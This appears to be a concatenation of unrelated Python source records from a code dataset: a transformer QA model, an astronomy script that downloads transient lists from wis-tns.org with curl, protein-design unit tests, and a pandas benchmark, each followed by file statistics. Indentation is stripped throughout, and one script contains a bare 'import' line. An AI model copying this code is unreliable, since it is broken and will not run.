def get_log_prob(self, x):
return self.head.get_log_prob(x)
# (N, S, 2) -> (N, S, 2)
def get_prob(self, x):
return self.head.get_prob(x)
# (N, S, 2), (N, 2) -> (1, )
def get_loss(self, scores, y):
return self.head.get_loss(scores, y)
class WordTransformerQA(nn.Module):
def __init__(
self,
dim,
n_heads,
ff_dim,
activation,
dropout,
attn_dropout,
act_dropout,
n_layers,
max_positions,
word_vectors,
):
super().__init__()
self.embed = T.TransformerEncoderEmbedding(
T.LearnedTokenEmbedding(word_vectors.size(0), dim, 0),
T.LearnedPositionalEmbedding(max_positions, dim),
dim=dim,
dropout=dropout,
)
self.encoder = T.TransformerEncoder(
T.TransformerEncoderLayer(
dim=dim,
n_heads=n_heads,
ff_dim=ff_dim,
activation=activation,
dropout=dropout,
attn_dropout=attn_dropout,
act_dropout=act_dropout,
),
n_layers=n_layers,
)
self.head = T.LinearQAHead(dim=dim, output_logits=2)
self.apply(lambda mod: T.init_params_bert(mod, 0.02))
# (S, N), (S, N), (N, S) -> (S, N, 2)
@amp.autocast()
def forward(self, x, positions=None, padding_mask=None):
x = x.transpose(0, 1)
if positions is None:
positions = T.get_positions(x)
else:
positions = positions.transpose(0, 1)
x = self.embed(x, positions)
x = self.encoder.forward(x, key_padding_mask=padding_mask)
x = self.head(x)
x = x.transpose(0, 1)
return x
# (N, S, 2), (N, S) -> (N, S, 2)
def mask_scores(self, x, padding_mask):
return self.head.mask_scores(x, padding_mask)
# (N, S, 2) -> (N, S, 2)
def get_log_prob(self, x):
return self.head.get_log_prob(x)
# (N, S, 2) -> (N, S, 2)
def get_prob(self, x):
return self.head.get_prob(x)
# (N, S, 2), (N, 2) -> (1, )
def get_loss(self, scores, y):
return self.head.get_loss(scores, y)
| 28.109589
| 66
| 0.541179
| 516
| 4,104
| 4.122093
| 0.155039
| 0.018806
| 0.019746
| 0.015045
| 0.86977
| 0.86977
| 0.86977
| 0.86977
| 0.86977
| 0.86977
| 0
| 0.01547
| 0.33845
| 4,104
| 146
| 67
| 28.109589
| 0.767956
| 0.084308
| 0
| 0.886957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104348
| false
| 0
| 0.043478
| 0.069565
| 0.252174
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0c396f04c14b94520c437db9d012b0597475c3a
| 13,995
|
py
|
Python
|
tns_check.py
|
changsuchoi/cspy
|
9fa8f125bed368f636ea19180e742f8304bbc432
|
[
"MIT"
] | null | null | null |
tns_check.py
|
changsuchoi/cspy
|
9fa8f125bed368f636ea19180e742f8304bbc432
|
[
"MIT"
] | null | null | null |
tns_check.py
|
changsuchoi/cspy
|
9fa8f125bed368f636ea19180e742f8304bbc432
|
[
"MIT"
] | null | null | null |
# daily tns report
# unclassified AT
# classified object
# include FRB
# save csv file as tns_search.csv in /home/cschoi/Download
# https://www.wis-tns.org/content/tns-getting-started
import os
import astropy.io.ascii as ascii
import sys
from astropy.table import Table, Column
import astropy.coordinates as coord
from astropy.time import Time
import astropy.units as u
import numpy as np
from astropy.coordinates import Angle
from astropy.coordinates import ICRS
from astropy.coordinates import SkyCoord
import pandas as pd
from datetime import datetime
os.chdir('/data7/cschoi/sngal/recent-sne-check/rochester-list')
#datetime.today().strftime("%Y%m%d%H%M%S") # YYYYmmddHHMMSS 형태의 시간 출력
#datetime.today().strftime("%Y/%m/%d %H:%M:%S") # YYYY/mm/dd HH:MM:SS 형태의 시간 출력
today=datetime.today()
today=datetime.today().strftime("%Y%m%d %H:%M:%S")[:8]
print(today)
radius=10.0 # 30 arcmin = 0.5 deg
print ('Radius '+str(radius)+' arcmin')
# print ('Reading recentsnelist.txt file ...')
# colnames=['Ra','Dec','EarliestObs','Host','Type','Last','Max','Link','Discoverer']
# latestsnelist=pd.read_table('recentsnelist.txt')
# latestsnelist=pd.read_table('recentlist.txt') #,names=colnames,data_start=1,guess='False')
# latestsnelist=ascii.read('recentsnelist.txt',delimiter='\t') #,names=colnames,data_start=1,guess='False')
imsnglist=ascii.read('/data7/cschoi/IMSNG/target/alltarget.dat')
# tns server search for 7days
# three 500 num pages files
os.system("curl \'https://www.wis-tns.org/search?&page=0&discovered_period_value=7&discovered_period_units=days&unclassified_at=0&classified_sne=0&include_frb=1&name=&name_like=0&isTNS_AT=all&public=all&ra=&decl=&radius=&coords_unit=arcsec&reporting_groupid%5B%5D=null&groupid%5B%5D=null&classifier_groupid%5B%5D=null&objtype%5B%5D=null&at_type%5B%5D=null&date_start%5Bdate%5D=&date_end%5Bdate%5D=&discovery_mag_min=&discovery_mag_max=&internal_name=&discoverer=&classifier=&spectra_count=&redshift_min=&redshift_max=&hostname=&ext_catid=&ra_range_min=&ra_range_max=&decl_range_min=&decl_range_max=&discovery_instrument%5B%5D=null&classification_instrument%5B%5D=null&associated_groups%5B%5D=null&official_discovery=0&official_classification=0&at_rep_remarks=&class_rep_remarks=&frb_repeat=all&frb_repeater_of_objid=&frb_measured_redshift=0&frb_dm_range_min=&frb_dm_range_max=&frb_rm_range_min=&frb_rm_range_max=&frb_snr_range_min=&frb_snr_range_max=&frb_flux_range_min=&frb_flux_range_max=&num_page=500&display%5Bredshift%5D=1&display%5Bhostname%5D=1&display%5Bhost_redshift%5D=1&display%5Bsource_group_name%5D=1&display%5Bclassifying_source_group_name%5D=1&display%5Bdiscovering_instrument_name%5D=0&display%5Bclassifing_instrument_name%5D=0&display%5Bprograms_name%5D=0&display%5Binternal_name%5D=1&display%5BisTNS_AT%5D=0&display%5Bpublic%5D=1&display%5Bend_pop_period%5D=0&display%5Bspectra_count%5D=1&display%5Bdiscoverymag%5D=1&display%5Bdiscmagfilter%5D=1&display%5Bdiscoverydate%5D=1&display%5Bdiscoverer%5D=1&display%5Bremarks%5D=0&display%5Bsources%5D=0&display%5Bbibcode%5D=0&display%5Bext_catalogs%5D=0&display%5Brepeater_of_objid%5D=0&display%5Bdm%5D=0&display%5Bgalactic_max_dm%5D=0&display%5Bbarycentric_event_time%5D=0&display%5Bpublic_webpage%5D=0&format=csv\' > tns0.csv")
os.system("curl \'https://www.wis-tns.org/search?&page=1&discovered_period_value=7&discovered_period_units=days&unclassified_at=0&classified_sne=0&include_frb=1&name=&name_like=0&isTNS_AT=all&public=all&ra=&decl=&radius=&coords_unit=arcsec&reporting_groupid%5B%5D=null&groupid%5B%5D=null&classifier_groupid%5B%5D=null&objtype%5B%5D=null&at_type%5B%5D=null&date_start%5Bdate%5D=&date_end%5Bdate%5D=&discovery_mag_min=&discovery_mag_max=&internal_name=&discoverer=&classifier=&spectra_count=&redshift_min=&redshift_max=&hostname=&ext_catid=&ra_range_min=&ra_range_max=&decl_range_min=&decl_range_max=&discovery_instrument%5B%5D=null&classification_instrument%5B%5D=null&associated_groups%5B%5D=null&official_discovery=0&official_classification=0&at_rep_remarks=&class_rep_remarks=&frb_repeat=all&frb_repeater_of_objid=&frb_measured_redshift=0&frb_dm_range_min=&frb_dm_range_max=&frb_rm_range_min=&frb_rm_range_max=&frb_snr_range_min=&frb_snr_range_max=&frb_flux_range_min=&frb_flux_range_max=&num_page=500&display%5Bredshift%5D=1&display%5Bhostname%5D=1&display%5Bhost_redshift%5D=1&display%5Bsource_group_name%5D=1&display%5Bclassifying_source_group_name%5D=1&display%5Bdiscovering_instrument_name%5D=0&display%5Bclassifing_instrument_name%5D=0&display%5Bprograms_name%5D=0&display%5Binternal_name%5D=1&display%5BisTNS_AT%5D=0&display%5Bpublic%5D=1&display%5Bend_pop_period%5D=0&display%5Bspectra_count%5D=1&display%5Bdiscoverymag%5D=1&display%5Bdiscmagfilter%5D=1&display%5Bdiscoverydate%5D=1&display%5Bdiscoverer%5D=1&display%5Bremarks%5D=0&display%5Bsources%5D=0&display%5Bbibcode%5D=0&display%5Bext_catalogs%5D=0&display%5Brepeater_of_objid%5D=0&display%5Bdm%5D=0&display%5Bgalactic_max_dm%5D=0&display%5Bbarycentric_event_time%5D=0&display%5Bpublic_webpage%5D=0&format=csv\' > tns1.csv")
os.system("curl \'https://www.wis-tns.org/search?&page=2&discovered_period_value=7&discovered_period_units=days&unclassified_at=0&classified_sne=0&include_frb=1&name=&name_like=0&isTNS_AT=all&public=all&ra=&decl=&radius=&coords_unit=arcsec&reporting_groupid%5B%5D=null&groupid%5B%5D=null&classifier_groupid%5B%5D=null&objtype%5B%5D=null&at_type%5B%5D=null&date_start%5Bdate%5D=&date_end%5Bdate%5D=&discovery_mag_min=&discovery_mag_max=&internal_name=&discoverer=&classifier=&spectra_count=&redshift_min=&redshift_max=&hostname=&ext_catid=&ra_range_min=&ra_range_max=&decl_range_min=&decl_range_max=&discovery_instrument%5B%5D=null&classification_instrument%5B%5D=null&associated_groups%5B%5D=null&official_discovery=0&official_classification=0&at_rep_remarks=&class_rep_remarks=&frb_repeat=all&frb_repeater_of_objid=&frb_measured_redshift=0&frb_dm_range_min=&frb_dm_range_max=&frb_rm_range_min=&frb_rm_range_max=&frb_snr_range_min=&frb_snr_range_max=&frb_flux_range_min=&frb_flux_range_max=&num_page=500&display%5Bredshift%5D=1&display%5Bhostname%5D=1&display%5Bhost_redshift%5D=1&display%5Bsource_group_name%5D=1&display%5Bclassifying_source_group_name%5D=1&display%5Bdiscovering_instrument_name%5D=0&display%5Bclassifing_instrument_name%5D=0&display%5Bprograms_name%5D=0&display%5Binternal_name%5D=1&display%5BisTNS_AT%5D=0&display%5Bpublic%5D=1&display%5Bend_pop_period%5D=0&display%5Bspectra_count%5D=1&display%5Bdiscoverymag%5D=1&display%5Bdiscmagfilter%5D=1&display%5Bdiscoverydate%5D=1&display%5Bdiscoverer%5D=1&display%5Bremarks%5D=0&display%5Bsources%5D=0&display%5Bbibcode%5D=0&display%5Bext_catalogs%5D=0&display%5Brepeater_of_objid%5D=0&display%5Bdm%5D=0&display%5Bgalactic_max_dm%5D=0&display%5Bbarycentric_event_time%5D=0&display%5Bpublic_webpage%5D=0&format=csv\' > tns2.csv")
# one day search
#os.system("curl \'https://www.wis-tns.org/&page=X&search?&discovered_period_value=7&discovered_period_units=days&unclassified_at=0&classified_sne=0&include_frb=1&name=&name_like=0&isTNS_AT=all&public=all&ra=&decl=&radius=&coords_unit=arcsec&reporting_groupid%5B%5D=null&groupid%5B%5D=null&classifier_groupid%5B%5D=null&objtype%5B%5D=null&at_type%5B%5D=null&date_start%5Bdate%5D=&date_end%5Bdate%5D=&discovery_mag_min=&discovery_mag_max=&internal_name=&discoverer=&classifier=&spectra_count=&redshift_min=&redshift_max=&hostname=&ext_catid=&ra_range_min=&ra_range_max=&decl_range_min=&decl_range_max=&discovery_instrument%5B%5D=null&classification_instrument%5B%5D=null&associated_groups%5B%5D=null&official_discovery=0&official_classification=0&at_rep_remarks=&class_rep_remarks=&frb_repeat=all&frb_repeater_of_objid=&frb_measured_redshift=0&frb_dm_range_min=&frb_dm_range_max=&frb_rm_range_min=&frb_rm_range_max=&frb_snr_range_min=&frb_snr_range_max=&frb_flux_range_min=&frb_flux_range_max=&display%5Bredshift%5D=1&display%5Bhostname%5D=1&display%5Bhost_redshift%5D=1&display%5Bsource_group_name%5D=1&display%5Bclassifying_source_group_name%5D=1&display%5Bdiscovering_instrument_name%5D=0&display%5Bclassifing_instrument_name%5D=0&display%5Bprograms_name%5D=0&display%5Binternal_name%5D=1&display%5BisTNS_AT%5D=0&display%5Bpublic%5D=1&display%5Bend_pop_period%5D=0&display%5Bspectra_count%5D=1&display%5Bdiscoverymag%5D=1&display%5Bdiscmagfilter%5D=1&display%5Bdiscoverydate%5D=1&display%5Bdiscoverer%5D=1&display%5Bremarks%5D=0&display%5Bsources%5D=0&display%5Bbibcode%5D=0&display%5Bext_catalogs%5D=0&display%5Brepeater_of_objid%5D=0&display%5Bdm%5D=0&display%5Bgalactic_max_dm%5D=0&display%5Bbarycentric_event_time%5D=0&display%5Bpublic_webpage%5D=0&format=csv\' > tnstest.csv")
tns0=ascii.read('tns0.csv')
tns1=ascii.read('tns1.csv')
tns2=ascii.read('tns2.csv')
# vstack
import
'''
https://www.wis-tns.org/search?
&page=0
&discovered_period_value=1
&discovered_period_units=days
&unclassified_at=0
&classified_sne=0
&include_frb=1
&name=
&name_like=0
&isTNS_AT=all
&public=all
&ra=
&decl=
&radius=
&coords_unit=arcsec
&reporting_groupid%5B%5D=null
&groupid%5B%5D=null
&classifier_groupid%5B%5D=null
&objtype%5B%5D=null
&at_type%5B%5D=null
&date_start%5Bdate%5D=
&date_end%5Bdate%5D=
&discovery_mag_min=
&discovery_mag_max=
&internal_name=
&discoverer=
&classifier=
&spectra_count=
&redshift_min=
&redshift_max=
&hostname=
&ext_catid=
&ra_range_min=
&ra_range_max=
&decl_range_min=
&decl_range_max=
&discovery_instrument%5B%5D=null
&classification_instrument%5B%5D=null
&associated_groups%5B%5D=null
&official_discovery=0
&official_classification=0
&at_rep_remarks=
&class_rep_remarks=
&frb_repeat=all
&frb_repeater_of_objid=
&frb_measured_redshift=0
&frb_dm_range_min=
&frb_dm_range_max=
&frb_rm_range_min=
&frb_rm_range_max=
&frb_snr_range_min=
&frb_snr_range_max=
&frb_flux_range_min=
&frb_flux_range_max=
&num_page=500
&display%5Bredshift%5D=1
&display%5Bhostname%5D=1
&display%5Bhost_redshift%5D=1
&display%5Bsource_group_name%5D=1
&display%5Bclassifying_source_group_name%5D=1
&display%5Bdiscovering_instrument_name%5D=0
&display%5Bclassifing_instrument_name%5D=0
&display%5Bprograms_name%5D=0
&display%5Binternal_name%5D=1
&display%5BisTNS_AT%5D=0
&display%5Bpublic%5D=1
&display%5Bend_pop_period%5D=0
&display%5Bspectra_count%5D=1
&display%5Bdiscoverymag%5D=1
&display%5Bdiscmagfilter%5D=1
&display%5Bdiscoverydate%5D=1
&display%5Bdiscoverer%5D=1
&display%5Bremarks%5D=0
&display%5Bsources%5D=0
&display%5Bbibcode%5D=0
&display%5Bext_catalogs%5D=0
&display%5Brepeater_of_objid%5D=0
&display%5Bdm%5D=0
&display%5Bgalactic_max_dm%5D=0
&display%5Bbarycentric_event_time%5D=0
&display%5Bpublic_webpage%5D=0
&page=X
&format=csv
Quick query links
Unclassified ATs:
https://www.wis-tns.org/search?&isTNS_AT=yes&unclassified_at=1&num_page=500
Unclassified ATs within a discovery magnitude range (e.g. 15-17):
https://www.wis-tns.org/search?&isTNS_AT=yes&unclassified_at=1&discovery...
Classified SNe:
https://www.wis-tns.org/search?&isTNS_AT=yes&classified_sne=1&num_page=500
To download as CSV, add "&format=csv", e.g. for classified SNe:
https://www.wis-tns.org/search?&isTNS_AT=yes&classified_sne=1&num_page=5...
Additional notes:
- The maximum allowed number of results per page is 500 (num_page=500).
- If downloading as CSV/TSV and the retrieved results surpass the maximum, you
may implement paging by specifying &page=X (0 being the 1st page), e.g.:
https://www.wis-tns.org/search?&page=0&isTNS_AT=yes&classified_sne=1&num...
https://www.wis-tns.org/search?&page=1&isTNS_AT=yes&classified_sne=1&num...
[ Top ]
Daily CSV Staging
Every day after UT midnight, two CSV files are created and are accessible for
download under: https://www.wis-tns.org/system/files/tns_public_objects/
1. tns_public_objects.csv.zip - holds the entire catalog of TNS public objects
(AT/SN/FRB/... ~70,000 currently). This file is overwritten daily. The date and
time when the list of objects was created is specified in the first line; e.g.
"2021-03-15 00:00:00"
2. tns_public_objects_YYYYMMDD.csv.zip - holds only those entries (objects) that
were either added or modified during the specified day. So, e.g. during Mar 15,
2021 it is possible to download this latest CSV for the previous day:
tns_public_objects_20210314.csv.zip The first line in the CSV will contain the
exact duration covering the entries in the file; e.g. for the above example:
"2021-03-14 00:00:00 - 23:59:59"
The separate daily files remain in place for 1 month backwards.
Staging the CSV files serves to fulfil requests by TNS users, as well as encourage
performing time-consuming operations locally by users, reducing the load on the
TNS servers.
For example, if you need to cross-match entire catalogs or long object lists, we
request that this would be done locally, against the csv (or a locally managed
DB), rather than by executing multiple cone-searches via the Search API. Calling
the APIs for a limited number of objects is clearly fine, but we ask that our
users apply appropriate caution and sensibility when using the TNS resources,
that serve a broad community.
The csv's contain the following columns:
"objid","name_prefix","name","ra","declination","redshift","typeid","type",
"reporting_groupid","reporting_group","source_groupid","source_group",
"discoverydate","discoverymag","discmagfilter","filter",
"reporters","time_received","internal_names","creationdate","lastmodified"
cURL usage examples for downloading (note that the api_key is required):
curl -X POST -d 'api_key=YOUR-API-KEY' https://www.wis-tns.org/system/files/tns_public_objects/tns_public_objec... > tns_public_objects.csv.zip
curl -X POST -d 'api_key=YOUR-API-KEY' https://www.wis-tns.org/system/files/tns_public_objects/tns_public_objec... > tns_public_objects_20210314.csv.zip
Or if logged in, you can just go to the URL for downloading the CSV:
https://www.wis-tns.org/system/files/tns_public_objects/tns_public_objec...
https://www.wis-tns.org/system/files/tns_public_objects/tns_public_objec... (specify the required date)
'''
| 55.098425
| 1,791
| 0.817506
| 2,368
| 13,995
| 4.603041
| 0.166385
| 0.019266
| 0.059633
| 0.021835
| 0.739266
| 0.735138
| 0.731101
| 0.720092
| 0.712202
| 0.704771
| 0
| 0.049741
| 0.049018
| 13,995
| 253
| 1,792
| 55.316206
| 0.769254
| 0.183637
| 0
| 0
| 0
| 0.111111
| 0.887557
| 0.014744
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.518519
| null | null | 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
f0e72a87fa7ce9b1264f70ed19e101617491ddc1
| 6,954
|
py
|
Python
|
worms/tests/test_pose_contortions.py
|
abiedermann/worms
|
026c45a88d5c71b0e035ac83de6f4dc107316ed8
|
[
"Apache-2.0"
] | 4
|
2018-01-30T23:13:43.000Z
|
2021-02-12T22:36:54.000Z
|
worms/tests/test_pose_contortions.py
|
abiedermann/worms
|
026c45a88d5c71b0e035ac83de6f4dc107316ed8
|
[
"Apache-2.0"
] | 9
|
2018-02-23T00:52:25.000Z
|
2022-01-26T00:02:32.000Z
|
worms/tests/test_pose_contortions.py
|
abiedermann/worms
|
026c45a88d5c71b0e035ac83de6f4dc107316ed8
|
[
"Apache-2.0"
] | 4
|
2018-06-28T21:30:14.000Z
|
2022-03-30T17:50:42.000Z
|
from functools import partial
import pytest
from worms.segments import Spliceable, Segment
from worms.tests import only_if_pyrosetta
from worms.pose_contortions import reorder_spliced_as_N_to_C
def test_reorder_spliced_as_N_to_C():
Q = reorder_spliced_as_N_to_C
with pytest.raises(ValueError):
Q([[1], [1], [1]], "NC")
with pytest.raises(ValueError):
Q([[1], [1], [1]], "CN")
with pytest.raises(ValueError):
Q([[1, 1], [1], [1, 1]], "CN")
with pytest.raises(ValueError):
Q([], "CN")
with pytest.raises(ValueError):
Q([], "")
with pytest.raises(ValueError):
Q([[]], "")
assert Q([[1]], "") == [[1]]
assert Q([[1, 2]], "") == [[1], [2]]
assert Q([[1], [2]], "N") == [[1, 2]]
assert Q([[1, 2], [3]], "N") == [[1], [2, 3]]
assert Q([[1, 2], [3, 4]], "N") == [[1], [2, 3], [4]]
assert Q([[1, 2, 3], [4, 5]], "N") == [[1], [2], [3, 4], [5]]
assert Q([[1], [2]], "C") == [[2, 1]]
assert Q([[1, 2], [3]], "C") == [[1], [3, 2]]
assert Q([[1, 2], [3, 4]], "C") == [[1], [3, 2], [4]]
assert Q([[1, 2, 3], [4, 5]], "C") == [[1], [2], [4, 3], [5]]
assert Q([[1], [2], [3]], "NN") == [[1, 2, 3]]
assert Q([[1], [2], [3, 4]], "NN") == [[1, 2, 3], [4]]
assert Q([[1], [2, 3], [4, 5]], "NN") == [[1, 2], [3, 4], [5]]
assert Q([[1, 2], [3, 4], [5, 6]], "NN") == [[1], [2, 3], [4, 5], [6]]
assert Q([[1, 2, 3], [4, 5, 6], [7, 8, 9]], "NN") == [
[1],
[2],
[3, 4],
[5],
[6, 7],
[8],
[9],
]
assert Q([[1, 2, 3], [4, 5, 6], [7, 8, 9]], "CN") == [
[1],
[2],
[4, 3],
[5],
[6, 7],
[8],
[9],
]
assert Q([[1, 2, 3], [4, 5, 6], [7, 8, 9]], "CC") == [
[1],
[2],
[4, 3],
[5],
[7, 6],
[8],
[9],
]
assert Q([[1, 2, 3], [4, 5, 6], [7, 8, 9]], "NC") == [
[1],
[2],
[3, 4],
[5],
[7, 6],
[8],
[9],
]
for n in range(10):
x = [[i] for i in range(n + 1)]
y = list(range(n + 1))
assert Q(x, "N" * n) == [y]
assert Q(x, "C" * n) == [y[::-1]]
assert Q([[13, 14]] + x, "N" + "N" * n) == [[13], [14] + y]
assert Q([[13, 14]] + x, "C" + "C" * n) == [[13], y[::-1] + [14]]
assert Q([[10, 11, 12]] + x + [[13, 14, 15]], "N" + "N" * n + "N") == [
[10],
[11],
[12] + y + [13],
[14],
[15],
]
assert Q([[10, 11, 12]] + x + [[13, 14, 15]], "C" + "C" * n + "C") == [
[10],
[11],
[13] + y[::-1] + [12],
[14],
[15],
]
assert Q([[1, 2, 3], [4, 5, 6], [7, 8, 9], [0, 1, 2]], "NNN") == [
[1],
[2],
[3, 4],
[5],
[6, 7],
[8],
[9, 0],
[1],
[2],
]
assert Q([[1, 2, 3], [4, 5, 6], [7, 8, 9], [0, 1, 2]], "CNN") == [
[1],
[2],
[4, 3],
[5],
[6, 7],
[8],
[9, 0],
[1],
[2],
]
assert Q([[1, 2, 3], [4, 5, 6], [7, 8, 9], [0, 1, 2]], "NCN") == [
[1],
[2],
[3, 4],
[5],
[7, 6],
[8],
[9, 0],
[1],
[2],
]
assert Q([[1, 2, 3], [4, 5, 6], [7, 8, 9], [0, 1, 2]], "NNC") == [
[1],
[2],
[3, 4],
[5],
[6, 7],
[8],
[0, 9],
[1],
[2],
]
assert Q([[1, 2, 3], [4, 5, 6], [7, 8, 9], [0, 1, 2]], "NCC") == [
[1],
[2],
[3, 4],
[5],
[7, 6],
[8],
[0, 9],
[1],
[2],
]
assert Q([[1, 2, 3], [4, 5, 6], [11], [7, 8, 9], [0, 1, 2]], "NCCC") == [
[1],
[2],
[3, 4],
[5],
[7, 11, 6],
[8],
[0, 9],
[1],
[2],
]
assert Q([[1, 2, 3], [4, 5, 6], [11], [12], [7, 8, 9], [0, 1, 2]], "NCCCN") == [
[1],
[2],
[3, 4],
[5],
[7, 12, 11, 6],
[8],
[9, 0],
[1],
[2],
]
assert Q([[1, 2, 5, 5, 3], [4, 5, 6], [11], [12], [7, 8, 9], [0, 1, 2]],
"NCCCN") == [[1], [2], [5], [5], [3, 4], [5], [7, 12, 11, 6], [8], [9, 0], [1], [2]]
@only_if_pyrosetta
def test_make_pose_chains_dimer(c2pose):
dimer = Spliceable(
c2pose,
sites=[("1,2:2", "N"), ("2,3:3", "N"), ("1,-4:-4", "C"), ("2,-5:-5", "C")],
)
seq = dimer.body.sequence()[:12]
seg = Segment([dimer], "N", None)
enex, rest = seg.make_pose_chains(0, pad=(0, 1))
assert [x[0].sequence() for x in enex] == [seq[1:], seq]
assert [x[0].sequence() for x in rest] == []
assert enex[-1][0] is dimer.chains[2]
enex, rest = seg.make_pose_chains(1, pad=(0, 1))
assert [x[0].sequence() for x in enex] == [seq[2:], seq]
assert [x[0].sequence() for x in rest] == []
assert enex[-1][0] is dimer.chains[1]
seg = Segment([dimer], "C", None)
enex, rest = seg.make_pose_chains(0, pad=(0, 1))
assert [x[0].sequence() for x in enex] == [seq[:-3], seq]
assert [x[0].sequence() for x in rest] == []
assert enex[-1][0] is dimer.chains[2]
enex, rest = seg.make_pose_chains(1, pad=(0, 1))
assert [x[0].sequence() for x in enex] == [seq[:-4], seq]
assert [x[0].sequence() for x in rest] == []
assert enex[-1][0] is dimer.chains[1]
seg = Segment([dimer], None, "N")
enex, rest = seg.make_pose_chains(0, pad=(0, 1))
assert [x[0].sequence() for x in enex] == [seq, seq[1:]]
assert [x[0].sequence() for x in rest] == []
assert enex[0][0] is dimer.chains[2]
enex, rest = seg.make_pose_chains(1, pad=(0, 1))
assert [x[0].sequence() for x in enex] == [seq, seq[2:]]
assert [x[0].sequence() for x in rest] == []
assert enex[0][0] is dimer.chains[1]
seg = Segment([dimer], "N", "N")
enex, rest = seg.make_pose_chains(0, pad=(0, 1))
assert [x[0].sequence() for x in enex] == [seq[1:], seq[2:]]
assert [x[0].sequence() for x in rest] == []
enex, rest = seg.make_pose_chains(1, pad=(0, 1))
assert [x[0].sequence() for x in enex] == [seq[2:], seq[1:]]
assert [x[0].sequence() for x in rest] == []
with pytest.raises(IndexError):
enex, rest = seg.make_pose_chains(2, pad=(0, 1))
seg = Segment([dimer], "N", "C")
enex, rest = seg.make_pose_chains(0, pad=(0, 1))
assert [x[0].sequence() for x in enex] == [seq[1:-3]]
assert [x[0].sequence() for x in rest] == [seq]
assert rest[0][0] is dimer.chains[2]
enex, rest = seg.make_pose_chains(1, pad=(0, 1))
assert [x[0].sequence() for x in enex] == [seq[1:], seq[:-4]]
assert [x[0].sequence() for x in rest] == []
enex, rest = seg.make_pose_chains(2, pad=(0, 1))
assert [x[0].sequence() for x in enex] == [seq[2:], seq[:-3]]
assert [x[0].sequence() for x in rest] == []
enex, rest = seg.make_pose_chains(3, pad=(0, 1))
assert [x[0].sequence() for x in enex] == [seq[2:-4]]
assert [x[0].sequence() for x in rest] == [seq]
assert rest[0][0] is dimer.chains[1]
with pytest.raises(IndexError):
enex, rest = seg.make_pose_chains(4, pad=(0, 1))
| 28.5
| 96
| 0.410986
| 1,143
| 6,954
| 2.454068
| 0.067367
| 0.045633
| 0.038503
| 0.044207
| 0.836364
| 0.799287
| 0.754367
| 0.74082
| 0.703387
| 0.635294
| 0
| 0.121886
| 0.301553
| 6,954
| 243
| 97
| 28.617284
| 0.455631
| 0
| 0
| 0.580786
| 0
| 0
| 0.015531
| 0
| 0
| 0
| 0
| 0
| 0.279476
| 1
| 0.008734
| false
| 0
| 0.021834
| 0
| 0.030568
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b0b2148c60fcc1bc1776363e3c2b2eadf3f3486
| 84
|
py
|
Python
|
source/AI/KI_testing/test_game_ai/framework_tutorial-master/gym_game/envs/__init__.py
|
JonasHimmetsbergerStudent/ScribbleFight
|
b896a152b26fde5a57cd72cea074c952c4ea0de9
|
[
"MIT"
] | null | null | null |
source/AI/KI_testing/test_game_ai/framework_tutorial-master/gym_game/envs/__init__.py
|
JonasHimmetsbergerStudent/ScribbleFight
|
b896a152b26fde5a57cd72cea074c952c4ea0de9
|
[
"MIT"
] | 3
|
2021-07-09T21:32:37.000Z
|
2021-07-09T21:55:02.000Z
|
PyRacing1/gym_game/envs/__init__.py
|
CeVauDe/bugfree-game-about-bugs
|
ff1b3e07188fca1775fcc1ce95b59b188c29cee2
|
[
"MIT"
] | null | null | null |
from gym_game.envs.custom_env import *
from gym_game.envs.pygame_2d import PyGame2D
| 28
| 44
| 0.845238
| 15
| 84
| 4.466667
| 0.666667
| 0.208955
| 0.328358
| 0.447761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026316
| 0.095238
| 84
| 2
| 45
| 42
| 0.855263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0b0e73847aa96a20fc1c98841784609b75698088
| 2,375
|
py
|
Python
|
asv_bench/benchmarks/panel_ctor.py
|
springcoil/pandas
|
945075ad78cef652039feb50d60092b0580604e6
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 2
|
2017-05-07T02:08:12.000Z
|
2017-12-14T01:47:47.000Z
|
asv_bench/benchmarks/panel_ctor.py
|
springcoil/pandas
|
945075ad78cef652039feb50d60092b0580604e6
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 1
|
2016-09-30T11:15:32.000Z
|
2016-09-30T11:15:32.000Z
|
asv_bench/benchmarks/panel_ctor.py
|
springcoil/pandas
|
945075ad78cef652039feb50d60092b0580604e6
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 1
|
2018-12-30T14:53:50.000Z
|
2018-12-30T14:53:50.000Z
|
from .pandas_vb_common import *
class panel_from_dict_all_different_indexes(object):
goal_time = 0.2
def setup(self):
self.data_frames = {}
self.start = datetime(1990, 1, 1)
self.end = datetime(2012, 1, 1)
for x in range(100):
self.end += timedelta(days=1)
self.dr = np.asarray(date_range(self.start, self.end))
self.df = DataFrame({'a': ([0] * len(self.dr)), 'b': ([1] * len(self.dr)), 'c': ([2] * len(self.dr)), }, index=self.dr)
self.data_frames[x] = self.df
